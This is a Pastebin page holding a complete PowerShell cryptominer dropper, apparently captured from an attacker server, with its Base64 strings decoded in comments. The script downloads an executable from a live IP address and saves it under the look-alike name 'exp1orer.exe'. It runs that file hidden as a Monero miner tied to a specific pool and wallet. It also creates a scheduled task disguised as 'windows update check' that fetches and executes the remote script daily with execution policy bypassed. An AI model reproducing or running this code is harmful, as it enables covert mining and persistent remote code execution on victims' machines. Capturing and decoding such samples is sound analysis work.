Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Source: 122.10.88[.]136/oop/main.ps1
- $download_file='c:\windows\tasks\exp1orer.exe'
- function ConvertFrom-Base64($string) {
- $bytes = [System.Convert]::FromBase64String($string);
- $decoded = [System.Text.Encoding]::UTF8.GetString($bytes);
- return $decoded;
- }
- if ((!((Get-Process exp1orer) -eq $null)))
- {
- exit
- }
- if ((!(Test-Path $download_file))){
- $p = New-Object System.Net.WebClient;
- $p.DownloadFile("http://122.10.88.136/oop/consolehost.exe",$download_file);
- }
- $WSH = New-Object -Com WScript.Shell;
- $decode = ConvertFrom-Base64("Yzpcd2luZG93c1x0YXNrc1xleHAxb3Jlci5leGUgLW8gcG9vbC5zdXBwb3J0eG1yLmNvbTo1NTU1IC11IDRBTlUxaHpEU2J4RFpBQ1ZISGF6bmlKdVRFQ3B3WEZFM1ZFQnRlc2RVVHJEMUtGTHM2OGt4VjNaZzV6Q0M5YTM4dllud1R6aHJMYmZyVDlCcEw2YXB2ZFo1YVpCdGNBIC1wIHggLWsgLUIgLS1kb25hdGUtbGV2ZWw9MQ==");
- $WSH.Run($decode,0);
- $decode2 = ConvertFrom-Base64("c2NodGFza3MgL2NyZWF0ZSAvdG4gIndpbmRvd3MgdXBkYXRlIGNoZWNrIiAvdHIgInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dzdHlsZSBoaWRkZW4gLW5vbmludGVyYWN0aXZlIC1ub2xvZ28gaWV4IChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTIyLjEwLjg4LjEzNi9vb3AvbWFpbi5wczEnKSIgL3NjIGRhaWx5IC9zdCAxMjowMCAvRg==")
- $WSH.Run($decode2,0);
- # Decoded:
- c:\windows\tasks\exp1orer.exe -o pool.supportxmr.com:5555 -u 4ANU1hzDSbxDZACVHHazniJuTECpwXFE3VEBtesdUTrD1KFLs68kxV3Zg5zCC9a38vYnwTzhrLbfrT9BpL6apvdZ5aZBtcA -p x -k -B --donate-level=1
- # Decoded2:
- schtasks /create /tn "windows update check" /tr "powershell.exe -executionpolicy bypass -Windowstyle hidden -noninteractive -nologo iex (New-Object Net.WebClient).DownloadString('http://122.10.88.136/oop/main.ps1')" /sc daily /st 12:00 /F
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
